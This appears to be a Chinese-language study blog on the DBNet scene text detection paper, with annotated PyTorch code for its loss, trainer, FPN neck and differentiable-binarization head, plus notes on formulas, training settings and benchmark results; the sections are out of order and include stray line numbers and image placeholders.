    self.bce_loss = BalanceCrossEntropyLoss(negative_ratio=ohem_ratio)
    self.dice_loss = DiceLoss(eps=eps)
    self.l1_loss = MaskL1Loss(eps=eps)
    self.ohem_ratio = ohem_ratio # 用于 OHEM(在线困难样本挖掘)的比例。
    self.reduction = reduction # 指定了损失的归约方式(均值或总和)。

    def forward(self, pred, batch):
    shrink_maps = pred[:, 0, :, :]
    threshold_maps = pred[:, 1, :, :]
    binary_maps = pred[:, 2, :, :]

    loss_shrink_maps = self.bce_loss(shrink_maps, batch['shrink_map'], batch['shrink_mask']) # 对 shrink_maps 使用交叉熵损失(OHEM)。
    loss_threshold_maps = self.l1_loss(threshold_maps, batch['threshold_map'], batch['threshold_mask']) # 对 threshold_maps 使用 L1 损失。
    metrics = dict(loss_shrink_maps=loss_shrink_maps, loss_threshold_maps=loss_threshold_maps) # 如果 pred 包含多于两个通道,还计算 binary_maps 的 Dice 损失。
    if pred.size()[1] > 2:
    loss_binary_maps = self.dice_loss(binary_maps, batch['shrink_map'], batch['shrink_mask'])
    metrics['loss_binary_maps'] = loss_binary_maps
    loss_all = self.alpha * loss_shrink_maps + self.beta * loss_threshold_maps + loss_binary_maps # 汇总各个损失项,并根据是否包含 binary_maps 来调整总损失 (loss_all)。
    metrics['loss'] = loss_all # 返回一个包含各个损失项和总损失的字典 metrics。
    else:
    metrics['loss'] = loss_shrink_maps
    return metrics

    Experiments

    from __future__ import print_function

    import argparse
    import os

    import anyconfig


    def init_args():
    parser = argparse.ArgumentParser(description='DBNet.pytorch')
    parser.add_argument('--config_file', default='config/open_dataset_resnet18_FPN_DBhead_polyLR.yaml', type=str)
    parser.add_argument('--local_rank', dest='local_rank', default=0, type=int, help='Use distributed training')

    args = parser.parse_args()
    return args


    def main(config):
    # 导入必要的模块,包括模型构建、损失函数、数据加载器、训练器、后处理和评估指标。
    import torch
    from models import build_model, build_loss
    from data_loader import get_dataloader
    from trainer import Trainer
    from post_processing import get_post_processing
    from utils import get_metric
    # 检查是否有多个 GPU,如果有,则初始化分布式训练环境。
    if torch.cuda.device_count() > 1:
    torch.cuda.set_device(args.local_rank)
    torch.distributed.init_process_group(backend="nccl", init_method="env://", world_size=torch.cuda.device_count(), rank=args.local_rank)
    config['distributed'] = True
    else:
    config['distributed'] = False
    config['local_rank'] = args.local_rank

    # 根据配置文件加载训练和验证数据加载器。
    train_loader = get_dataloader(config['dataset']['train'], config['distributed'])
    assert train_loader is not None
    if 'validate' in config['dataset']:
    validate_loader = get_dataloader(config['dataset']['validate'], False)
    else:
    validate_loader = None

    # 构建损失函数并将其移动到 GPU。
    criterion = build_loss(config['loss']).cuda()

    # 配置模型的输入通道数(彩色图像为 3 通道,灰度图像为 1 通道)。
    config['arch']['backbone']['in_channels'] = 3 if config['dataset']['train']['dataset']['args']['img_mode'] != 'GRAY' else 1
    model = build_model(config['arch'])

    # 构建模型、后处理函数和评估指标。
    post_p = get_post_processing(config['post_processing'])
    metric = get_metric(config['metric'])

    # 创建 Trainer 对象并开始训练。
    trainer = Trainer(config=config,
    model=model,
    criterion=criterion,
    train_loader=train_loader,
    post_process=post_p,
    metric_cls=metric,
    validate_loader=validate_loader)
    trainer.train()


    if __name__ == '__main__':
    # 处理模块路径,确保当前目录和上级目录在 Python 路径中。
    import sys
    import pathlib
    __dir__ = pathlib.Path(os.path.abspath(__file__))
    sys.path.append(str(__dir__))
    sys.path.append(str(__dir__.parent.parent))
    # project = 'DBNet.pytorch' # 工作项目根目录
    # sys.path.append(os.getcwd().split(project)[0] + project)

    # 使用 anyconfig 读取配置文件,并解析基础配置。
    from utils import parse_config

    args = init_args()
    assert os.path.exists(args.config_file)
    config = anyconfig.load(open(args.config_file, 'rb'))
    if 'base' in config:
    config = parse_config(config)
    # 调用 main 函数开始模型训练。
    main(config)
    import time

    import torch
    import torchvision.utils as vutils
    from tqdm import tqdm

    from base import BaseTrainer
    from utils import WarmupPolyLR, runningScore, cal_text_score


    class Trainer(BaseTrainer):
    # 初始化:__init__ 方法接受多个参数,包括配置 (config)、模型 (model)、损失函数 (criterion)、训练和验证数据加载器 (train_loader 和 validate_loader)、评估指标类 (metric_cls)、以及可选的后处理函数 (post_process)。
    def __init__(self, config, model, criterion, train_loader, validate_loader, metric_cls, post_process=None):
    super(Trainer, self).__init__(config, model, criterion)
    # 参数设置:从配置中读取训练迭代次数 (show_images_iter),并初始化训练和验证数据加载器。若验证数据加载器存在,确保提供了后处理函数和评估指标类。
    self.show_images_iter = self.config['trainer']['show_images_iter']
    self.train_loader = train_loader
    if validate_loader is not None:
    assert post_process is not None and metric_cls is not None
    self.validate_loader = validate_loader
    self.post_process = post_process
    self.metric_cls = metric_cls
    self.train_loader_len = len(train_loader)
    # 学习率调度器:根据配置,设置学习率调度器 WarmupPolyLR,用于调整学习率。它支持学习率的预热和多项式衰减。
    if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
    warmup_iters = config['lr_scheduler']['args']['warmup_epoch'] * self.train_loader_len
    if self.start_epoch > 1:
    self.config['lr_scheduler']['args']['last_epoch'] = (self.start_epoch - 1) * self.train_loader_len
    self.scheduler = WarmupPolyLR(self.optimizer, max_iters=self.epochs * self.train_loader_len,
    warmup_iters=warmup_iters, **config['lr_scheduler']['args'])
    # 日志记录:记录训练和验证数据集的样本数量和数据加载器的数量。
    if self.validate_loader is not None:
    self.logger_info(
    'train dataset has {} samples,{} in dataloader, validate dataset has {} samples,{} in dataloader'.format(
    len(self.train_loader.dataset), self.train_loader_len, len(self.validate_loader.dataset), len(self.validate_loader)))
    else:
    self.logger_info('train dataset has {} samples,{} in dataloader'.format(len(self.train_loader.dataset), self.train_loader_len))

    # 这段代码定义了 _train_epoch 方法,用于训练模型一个训练周期(epoch)。
    def _train_epoch(self, epoch):
    # 模型训练模式:调用 self.model.train() 设置模型为训练模式。
    self.model.train()
    # 时间记录:记录周期和批次的开始时间。
    epoch_start = time.time()
    batch_start = time.time()
    train_loss = 0.
    running_metric_text = runningScore(2)
    # 初始化:初始化累计损失 train_loss 和运行中的指标 running_metric_text,并获取当前学习率 lr。
    lr = self.optimizer.param_groups[0]['lr']

    # 遍历数据:遍历训练数据加载器中的每个批次:
    for i, batch in enumerate(self.train_loader):
    if i >= self.train_loader_len:
    break
    self.global_step += 1
    lr = self.optimizer.param_groups[0]['lr']

    # 数据进行转换和丢到 gpu
    # 将数据移动到 GPU 上。
    for key, value in batch.items():
    if value is not None:
    if isinstance(value, torch.Tensor):
    batch[key] = value.to(self.device)
    cur_batch_size = batch['img'].size()[0]

    # 通过模型生成预测 preds。
    preds = self.model(batch['img'])
    # 计算损失 loss_dict,并执行反向传播和优化步骤。
    loss_dict = self.criterion(preds, batch)
    # backward
    self.optimizer.zero_grad()
    loss_dict['loss'].backward()
    self.optimizer.step()
    # 如果使用了 WarmupPolyLR,更新学习率调度器。
    if self.config['lr_scheduler']['type'] == 'WarmupPolyLR':
    self.scheduler.step()
    # acc iou
    # 计算指标 score_shrink_map,并记录损失和准确度信息。
    score_shrink_map = cal_text_score(preds[:, 0, :, :], batch['shrink_map'], batch['shrink_mask'], running_metric_text,
    thred=self.config['post_processing']['args']['thresh'])

    # loss 和 acc 记录到日志
    # 日志记录:将损失和各个指标记录为字符串 loss_str,并累加到总训练损失 train_loss。
    loss_str = 'loss: {:.4f}, '.format(loss_dict['loss'].item())
    for idx, (key, value) in enumerate(loss_dict.items()):
    loss_dict[key] = value.item()
    if key == 'loss':
    continue
    loss_str += '{}: {:.4f}'.format(key, loss_dict[key])
    if idx < len(loss_dict) - 1:
    loss_str += ', '

    train_loss += loss_dict['loss']
    acc = score_shrink_map['Mean Acc']
    iou_shrink_map = score_shrink_map['Mean IoU']

    # 条件:每隔 log_iter 步记录一次日志。
    # 指标:计算每秒处理样本的速度,并记录准确率、IoU、损失和学习率。
    # 日志记录:使用 self.logger_info 输出这些指标,以便监控训练过程。
    if self.global_step % self.log_iter == 0:
    batch_time = time.time() - batch_start
    self.logger_info(
    '[{}/{}], [{}/{}], global_step: {}, speed: {:.1f} samples/sec, acc: {:.4f}, iou_shrink_map: {:.4f}, {}, lr:{:.6}, time:{:.2f}'.format(
    epoch, self.epochs, i + 1, self.train_loader_len, self.global_step, self.log_iter * cur_batch_size / batch_time, acc,
    iou_shrink_map, loss_str, lr, batch_time))
    batch_start = time.time()

    # 条件:如果启用了 TensorBoard,则写入日志。
    # 损失和指标:将各种训练指标和损失记录到 TensorBoard 中以便可视化。
    if self.tensorboard_enable and self.config['local_rank'] == 0:
    # write tensorboard
    for key, value in loss_dict.items():
    self.writer.add_scalar('TRAIN/LOSS/{}'.format(key), value, self.global_step)
    self.writer.add_scalar('TRAIN/ACC_IOU/acc', acc, self.global_step)
    self.writer.add_scalar('TRAIN/ACC_IOU/iou_shrink_map', iou_shrink_map, self.global_step)
    self.writer.add_scalar('TRAIN/lr', lr, self.global_step)
    # 图像可视化:条件:每隔 show_images_iter 步可视化一次图像。
    # 图像和标签:将原始图像、真实标签和模型预测结果添加到 TensorBoard 中。
    # 可视化:使用 vutils.make_grid 创建图像网格以便更好地可视化。
    if self.global_step % self.show_images_iter == 0:
    # show images on tensorboard
    self.inverse_normalize(batch['img'])
    self.writer.add_images('TRAIN/imgs', batch['img'], self.global_step)
    # shrink_labels and threshold_labels
    shrink_labels = batch['shrink_map']
    threshold_labels = batch['threshold_map']
    shrink_labels[shrink_labels <= 0.5] = 0
    shrink_labels[shrink_labels > 0.5] = 1
    show_label = torch.cat([shrink_labels, threshold_labels])
    show_label = vutils.make_grid(show_label.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
    self.writer.add_image('TRAIN/gt', show_label, self.global_step)
    # model output
    show_pred = []
    for kk in range(preds.shape[1]):
    show_pred.append(preds[:, kk, :, :])
    show_pred = torch.cat(show_pred)
    show_pred = vutils.make_grid(show_pred.unsqueeze(1), nrow=cur_batch_size, normalize=False, padding=20, pad_value=1)
    self.writer.add_image('TRAIN/preds', show_pred, self.global_step)
    # 总结:返回一个包含每个 epoch 的平均训练损失、学习率、总时间和 epoch 编号的字典。
    return {'train_loss': train_loss / self.train_loader_len, 'lr': lr, 'time': time.time() - epoch_start,
    'epoch': epoch}

    def _eval(self, epoch):
    # 这将影响模型的行为,比如在评估时关闭 dropout 和 batch normalization。
    self.model.eval()
    # torch.cuda.empty_cache() # speed up evaluating after training finished
    # raw_metrics 用来存储每个批次的评估指标,total_frame 用来记录总的处理帧数,total_time 记录总的处理时间。
    raw_metrics = []
    total_frame = 0.0
    total_time = 0.0
    for i, batch in tqdm(enumerate(self.validate_loader), total=len(self.validate_loader), desc='test model'):
    # 关闭梯度计算:这用于避免计算梯度,从而减少内存使用和加快计算速度。
    with torch.no_grad():
    # 数据进行转换和丢到gpu
    for key, value in batch.items():
    if value is not None:
    if isinstance(value, torch.Tensor):
    batch[key] = value.to(self.device)
    # 记录开始时间并进行预测:
    start = time.time()
    preds = self.model(batch['img'])
    # 对预测结果进行后处理:
    boxes, scores = self.post_process(batch, preds,is_output_polygon=self.metric_cls.is_output_polygon)
    # 更新统计数据:
    total_frame += batch['img'].size()[0]
    total_time += time.time() - start
    # 计算并记录评估指标:
    raw_metric = self.metric_cls.validate_measure(batch, (boxes, scores))
    raw_metrics.append(raw_metric)
    # 汇总指标:
    metrics = self.metric_cls.gather_measure(raw_metrics)
    # 记录每秒帧数(FPS):
    self.logger_info('FPS:{}'.format(total_frame / total_time))
    # 返回指标:
    return metrics['recall'].avg, metrics['precision'].avg, metrics['fmeasure'].avg

    def _on_epoch_finish(self):
    # 这个方法在每个训练周期结束时执行,执行以下操作:
    # 记录当前训练周期的信息:
    self.logger_info('[{}/{}], train_loss: {:.4f}, time: {:.4f}, lr: {}'.format(
    self.epoch_result['epoch'], self.epochs, self.epoch_result['train_loss'], self.epoch_result['time'],
    self.epoch_result['lr']))
    # 保存模型检查点:
    net_save_path = '{}/model_latest.pth'.format(self.checkpoint_dir)
    net_save_path_best = '{}/model_best.pth'.format(self.checkpoint_dir)

    # 如果是主进程:
    if self.config['local_rank'] == 0:
    # 保存当前模型检查点:
    self._save_checkpoint(self.epoch_result['epoch'], net_save_path)
    save_best = False
    if self.validate_loader is not None and self.metric_cls is not None: # 使用 f1 作为最优模型指标
    # 评估模型性能(如果有验证集和指标类):
    recall, precision, hmean = self._eval(self.epoch_result['epoch'])

    # 记录评估指标到 TensorBoard(如果启用):
    if self.tensorboard_enable:
    self.writer.add_scalar('EVAL/recall', recall, self.global_step)
    self.writer.add_scalar('EVAL/precision', precision, self.global_step)
    self.writer.add_scalar('EVAL/hmean', hmean, self.global_step)
    self.logger_info('test: recall: {:.6f}, precision: {:.6f}, f1: {:.6f}'.format(recall, precision, hmean))

    # 根据 F1 分数或训练损失判断是否保存最佳模型:
    if hmean >= self.metrics['hmean']:
    save_best = True
    self.metrics['train_loss'] = self.epoch_result['train_loss']
    self.metrics['hmean'] = hmean
    self.metrics['precision'] = precision
    self.metrics['recall'] = recall
    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
    else:
    if self.epoch_result['train_loss'] <= self.metrics['train_loss']:
    save_best = True
    self.metrics['train_loss'] = self.epoch_result['train_loss']
    self.metrics['best_model_epoch'] = self.epoch_result['epoch']
    # 记录最佳模型的信息并保存最佳模型:
    best_str = 'current best, '
    for k, v in self.metrics.items():
    best_str += '{}: {:.6f}, '.format(k, v)
    self.logger_info(best_str)
    if save_best:
    import shutil
    shutil.copy(net_save_path, net_save_path_best)
    self.logger_info("Saving current best: {}".format(net_save_path_best))
    else:
    self.logger_info("Saving checkpoint: {}".format(net_save_path))


    def _on_train_finish(self):
    # 这个方法在训练完成时执行,执行以下操作:
    # 记录所有指标信息:
    for k, v in self.metrics.items():
    self.logger_info('{}:{}'.format(k, v))
    # 记录训练完成的信息:
    self.logger_info('finish train')

    SynthText 是一个由 800k 张图像组成的合成数据集。这些图像是从 8k 个背景图像合成的。此数据集仅用于预训练我们的模型。

    ​ 训练数据的数据扩充包括:

    1. 角度范围为 $(-10{\circ},10{\circ})$ 的随机旋转
    2. 随机裁剪
    3. 随机翻转
    4. 为了提高训练效率,所有处理后的图像都被重新调整为 $640\times 640$

    • 使用 SynthText 数据集对它们进行 100k 次迭代的预训练
    • 1200 个 epoch 的相应真实世界数据集上微调模型。
      • 训练批次大小设置为 16。我们遵循多学习率策略,当前迭代的学习率等于初始学习率乘以 $(1-\frac{iter}{max_iter})^{power}$
        • 初始学习率设置为 0.007,$power$ 为 0.9
        • 使用 0.0001 的权重衰减和 0.9 的动量

    Ablation study

    ​ 证明各个模块都能提高性能。

    Comparisons with previous methods

    ​ P、R、F 三个指标都最佳。

    • TP: true positive。实际为正,预测为正。
    • FP: false positive。实际为负,预测为正。
    • TN: true negative。实际为负,预测为负。
    • FN: false negative。实际为正,预测为负。

    $$P=\frac{TP}{TP+FP}$$

    $$R=\frac{TP}{TP+FN}$$

    $$F=\frac{2PR}{P+R}$$


    在 TotalText 下的训练结果:

    MethodPRF
    DB-ResNet-18 (800)88.377.982.8
    DB-ResNet-50 (800)87.182.584.7

    在 CTW1500 下的训练结果:

    MethodPRF
    Ours-ResNet18 (1024)84.877.581.0
    Ours-ResNet50 (1024)86.980.283.4

    Limitation

    ​ 我们的方法的一个局限性是它不能处理 “文本中的文本” 的情况,这意味着一个文本实例在另一个文本例子中。尽管收缩的文本区域在文本实例不在另一个文本实例的中心区域的情况下很有帮助,但当文本实例正好位于另一个文字实例的中心区时,它会失败。这是基于分割的场景文本检测器的常见限制。

    Conclusion

    ​ 好使。

    ]]>
    + 资源

    正文

    Abstract

    • 基于分割的场景文本检测(可以获得像素级别的预测)可以更精确地描述曲线文本等各种形状的场景文本
    • 二值化的后处理对于基于分割的检测至关重要,该检测将分割方法产生的概率图转换为文本的边界框/区域
    • 提出了一个名为可微分二值化(DB)的模块,它可以在分割网络中执行二值化过程
    • 好使。

    Introduction

    ​ 本文的主要贡献是提出了可微的 DB 模块,它使二值化过程在 CNN 中可以端到端训练。

    webp

    • 大多数现有的检测方法使用类似的后处理流水线,如图所示(蓝色箭头后面):
      • 首先,它们设置了一个固定的阈值,用于将分割网络生成的概率图转换为二值图像;
      • 然后,使用像素聚类等启发式技术将像素分组到文本实例中。
    • 或者,我们的流水线(如图中的红色箭头所示)旨在将二值化操作插入到分割网络中进行联合优化。通过这种方式,可以自适应地预测图像每个位置的阈值,这可以完全区分像素与前景和背景。然而,标准的二值化函数是不可微的,我们提出了一种称为可微分二值化(DB)的近似函数,当与分割网络一起训练时,它是完全可微的。

    ​本文的主要贡献是提出了可微分的 DB 模块,这使得二值化过程在 CNN 中端到端可训练

    ​ 最近的场景文本检测方法大致可以分为两类:基于回归(Regression-based)的方法和基于分割(Segmentation-based)的方法。

    • 基于回归 Regression 的方法是一系列直接回归文本实例的边界框的模型。

    • 基于分割 Segmentation 的方法通常结合像素级预测和后处理算法来获得边界框

    • 快速的场景文本检测方法注重准确性和推理速度。

    Methodology

    webp

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    # -*- coding: utf-8 -*-
    # @Time : 2019/8/23 21:57
    # @Author : zhoujun
    from addict import Dict
    from torch import nn
    import torch.nn.functional as F

    from models.backbone import build_backbone
    from models.neck import build_neck
    from models.head import build_head


    class Model(nn.Module):
    def __init__(self, model_config: dict):
    """
    PANnet
    :param model_config: 模型配置
    """
    super().__init__()
    model_config = Dict(model_config) # 一个配置字典,用于指定模型的结构。转换为 Dict 对象,方便通过属性访问。
    # 从配置字典中提取 backbone、neck 和 head 的类型,并分别从配置中删除它们。
    backbone_type = model_config.backbone.pop('type')
    neck_type = model_config.neck.pop('type')
    head_type = model_config.head.pop('type')
    # 使用 build_backbone、build_neck 和 build_head 函数构建模型的不同部分。
    self.backbone = build_backbone(backbone_type, **model_config.backbone)
    self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
    self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
    # self.name 存储了模型的名字,由 backbone、neck 和 head 的类型组合而成。
    self.name = f'{backbone_type}_{neck_type}_{head_type}'

    def forward(self, x):
    _, _, H, W = x.size() # x 是输入的张量,尺寸为 [batch_size, channels, height, width]。
    backbone_out = self.backbone(x) # 使用 self.backbone 处理输入,得到 backbone_out。
    neck_out = self.neck(backbone_out) # 使用 self.neck 处理 backbone_out,得到 neck_out。
    y = self.head(neck_out) # 使用 self.head 处理 neck_out,得到最终输出 y。
    y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True) # F.interpolate 用于将输出 y 的尺寸调整为与输入 x 相同,以保持空间分辨率一致。
    return y # 最终返回调整后的 y。


    if __name__ == '__main__':
    import torch

    device = torch.device('cpu') # 创建一个 CPU 设备(可以改为 GPU)。
    x = torch.zeros(2, 3, 640, 640).to(device) # 创建一个大小为 [2, 3, 640, 640] 的零张量作为输入。

    model_config = {
    'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
    'neck': {'type': 'FPN', 'inner_channels': 256}, # 分割头,FPN or FPEM_FFM
    'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
    }
    model = Model(model_config=model_config).to(device) # 初始化 Model 对象,传入配置字典。
    import time # 测量前向传播的时间。

    tic = time.time()
    y = model(x)
    # 打印出前向传播的时间、输出的形状、模型的名称和模型的详细结构。
    print(time.time() - tic)
    print(y.shape)
    print(model.name)
    print(model)
    #(可选)将模型的状态字典保存到文件 PAN.pth。
    # torch.save(model.state_dict(), 'PAN.pth')
    • resnet
    • MobilenetV3
    • shfflenetv2
    • FPN

      • 该代码实现了一个特征金字塔网络(FPN)的模块,主要用于融合来自不同尺度的特征图。它包括:

        • 特征图减少层:将每个特征图的通道数减少到较小的值。

        • 平滑层:对每一层的特征图进行平滑处理。

        • 融合和上采样:通过上采样和拼接不同层的特征图来增强特征表示。

        • 最终卷积:对融合后的特征图进行进一步处理,以生成最终的输出。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    import torch
    import torch.nn.functional as F
    from torch import nn

    from models.basic import ConvBnRelu


    class FPN(nn.Module):
    def __init__(self, in_channels, inner_channels=256, **kwargs):
    """
    :param in_channels: 基础网络输出的维度
    :param kwargs:
    """
    super().__init__()
    inplace = True
    self.conv_out = inner_channels
    inner_channels = inner_channels // 4 # 定义了在融合过程中的中间通道数。
    # reduce layers 是用于将不同层的特征图通道数减少到 inner_channels 的卷积层。
    self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
    self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
    self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
    self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
    # Smooth layers 平滑层,用于进一步处理不同层次的特征图。
    self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
    self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
    self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

    self.conv = nn.Sequential(
    nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
    nn.BatchNorm2d(self.conv_out),
    nn.ReLU(inplace=inplace)
    ) # 是一个卷积层组合,用于处理最终融合后的特征图,包括卷积、批归一化和 ReLU 激活函数。
    self.out_channels = self.conv_out # 保存了输出特征图的通道数。

    def forward(self, x):
    c2, c3, c4, c5 = x # 是一个包含四个特征图的元组 (c2, c3, c4, c5),这些特征图来自基础网络的不同层。
    # Top-down
    p5 = self.reduce_conv_c5(c5)
    p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
    p4 = self.smooth_p4(p4)
    p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
    p3 = self.smooth_p3(p3)
    p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
    p2 = self.smooth_p2(p2)

    x = self._upsample_cat(p2, p3, p4, p5) # 将所有层的特征图在通道维度上进行拼接。
    x = self.conv(x) # 对拼接后的特征图进行最终处理,输出融合后的特征图。
    return x

    def _upsample_add(self, x, y):
    return F.interpolate(x, size=y.size()[2:]) + y # 将输入 x 上采样到与 y 相同的尺寸,并将其与 y 相加。

    def _upsample_cat(self, p2, p3, p4, p5): # 将 p2、p3、p4 和 p5 上采样到相同的尺寸,然后在通道维度上拼接它们。
    h, w = p2.size()[2:]
    p3 = F.interpolate(p3, size=(h, w))
    p4 = F.interpolate(p4, size=(h, w))
    p5 = F.interpolate(p5, size=(h, w))
    return torch.cat([p2, p3, p4, p5], dim=1)
    • ConvHead
      • ConvHead 是一个非常基础且常见的模块,通过一个 1x1 卷积层和 Sigmoid 激活函数对输入特征图进行变换。它主要用于生成最终的输出特征图,特别是在需要将特征图转换为概率图的任务中。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    import torch
    from torch import nn


    class ConvHead(nn.Module):
    def __init__(self, in_channels, out_channels,**kwargs):
    super().__init__()
    self.conv = nn.Sequential(
    # 一个卷积层,使用 1x1 的卷积核来对输入进行线性变换。这种卷积核的大小使得它主要作用于通道维度上的线性变换,而不改变空间维度(宽度和高度)。
    nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
    # 一个激活函数,将卷积层的输出限制在 0 到 1 之间。这个函数通常用于需要输出概率值的任务,例如二分类问题或需要对特征图进行归一化处理的任务。
    nn.Sigmoid()
    )

    def forward(self, x):
    return self.conv(x)
    • DBHead
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    import torch
    from torch import nn

    class DBHead(nn.Module):
    def __init__(self, in_channels, out_channels, k = 50):
    super().__init__()
    self.k = k # 用于前向传播时的步长函数的参数。
    self.binarize = nn.Sequential( # 一个生成二值图的顺序模块
    nn.Conv2d(in_channels, in_channels // 4, 3, padding=1), # 将通道数从 in_channels 降到 in_channels // 4,使用 3x3 的卷积核。
    nn.BatchNorm2d(in_channels // 4), # 批量归一化。
    nn.ReLU(inplace=True), # 非线性激活函数。
    nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2), # 上采样特征图两次(空间维度翻倍)。
    nn.BatchNorm2d(in_channels // 4),
    nn.ReLU(inplace=True),
    nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
    nn.Sigmoid()) # 输出 0 到 1 之间的值,适用于二值图。
    self.binarize.apply(self.weights_init)

    self.thresh = self._init_thresh(in_channels) # 使用 _init_thresh 方法生成阈值图。
    self.thresh.apply(self.weights_init)

    def forward(self, x):
    shrink_maps = self.binarize(x) # binarize 模块的输出。
    threshold_maps = self.thresh(x) # thresh 模块的输出。
    if self.training: # 训练模式下
    binary_maps = self.step_function(shrink_maps, threshold_maps) # 使用 step_function 计算二值图。
    y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1) # 将 shrink_maps、threshold_maps 和 binary_maps 连接在一起。
    else:
    y = torch.cat((shrink_maps, threshold_maps), dim=1)
    return y

    def weights_init(self, m): # 使用 He 初始化(kaiming_normal_)初始化卷积层的权重,并为批量归一化层设置特定的值。
    classname = m.__class__.__name__
    if classname.find('Conv') != -1:
    nn.init.kaiming_normal_(m.weight.data)
    elif classname.find('BatchNorm') != -1:
    m.weight.data.fill_(1.)
    m.bias.data.fill_(1e-4)

    def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
    # 创建一个生成阈值图的顺序模块。使用 nn.Conv2d、批量归一化、ReLU、上采样和 Sigmoid 激活。
    in_channels = inner_channels
    if serial:
    in_channels += 1
    self.thresh = nn.Sequential(
    nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
    nn.BatchNorm2d(inner_channels // 4),
    nn.ReLU(inplace=True),
    self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
    nn.BatchNorm2d(inner_channels // 4),
    nn.ReLU(inplace=True),
    self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
    nn.Sigmoid())
    return self.thresh

    def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
    # 定义上采样模块,使用邻近插值加卷积,或者使用转置卷积层。
    if smooth: # 平滑上采样
    inter_out_channels = out_channels
    if out_channels == 1:
    inter_out_channels = in_channels
    module_list = [
    nn.Upsample(scale_factor=2, mode='nearest'), # 使用 nn.Upsample 将输入的空间维度扩大一倍(使用最近邻插值)。
    nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)] # 接着应用 nn.Conv2d 层来对上采样后的特征图进行进一步处理。
    if out_channels == 1:
    # 如果 out_channels 等于 1,还会添加一个额外的 nn.Conv2d 层,以调整输出通道数。
    module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
    return nn.Sequential(module_list)
    else:
    # 直接使用 nn.ConvTranspose2d 层进行上采样(转置卷积),以实现空间维度的扩展。
    return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

    def step_function(self, x, y):
    # 应用步长函数生成二值图。此函数使用类似 sigmoid 的曲线来基于 x(收缩图)和 y(阈值图)的差异产生 0 到 1 之间的值。
    return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
    1. 输入图像输入到 feature-pyramid back-bone 中

    2. 金字塔特征被上采样到相同的尺度并级联以产生特征 $F$

    3. 特征 $F$ 被用于预测概率图 probability map $P$ 和阈值图 threshold map $T$

    4. DB 通过 $P$ 和 $F$ 计算近似二值映射,得到近似二值图 approximate binary map $\hat B$

    • 在 train 期间,监督应用于 $P$、$T$ 和 $\hat B$,其中 $P$ 和 $\hat B$ 共享相同的监督

    • 在 inference 期间,通过框公式化模块可以容易地从 $\hat B$ 或 $P$ 中获得边界框

    Binarization

    Standard binarization

    ​ 就是一刀切。

    $$B_{i,j}=\left{\begin{matrix} 1 & \mathrm{if}\ P_{i,j}>=t\ 0 & \mathrm{otherwise.}\end{matrix}\right.$$

    ​ 给定由分割网络产生的概率图 $P\in R^{H\times W}$,其中 $H$ 和 $W$ 表示图的高度和宽度,必须将其转换为二值图 $P\in R^{H\times W}$,其中值为 $1$ 被认为是有效的文本区域。其中 $t$ 是预定义的阈值,$(i,j)$ 表示 map 中的坐标点。

    Differentiable binarization

    ​ 上式不可微分,在 train 过程中就不可以与分割网络一起进行优化,因此,我们建议使用阶跃函数进行二值化:

    $$\hat B_{i,j}=\frac{1}{1+e^{-k(P_{i,j}-T_{i,j})}}$$

    ​ 其中 $\hat B$ 是近似二进制映射;$T$ 是从网络学习的自适应阈值映射;$k$ 表示放大因子。$k$ 根据经验设置为 50。

    1
    2
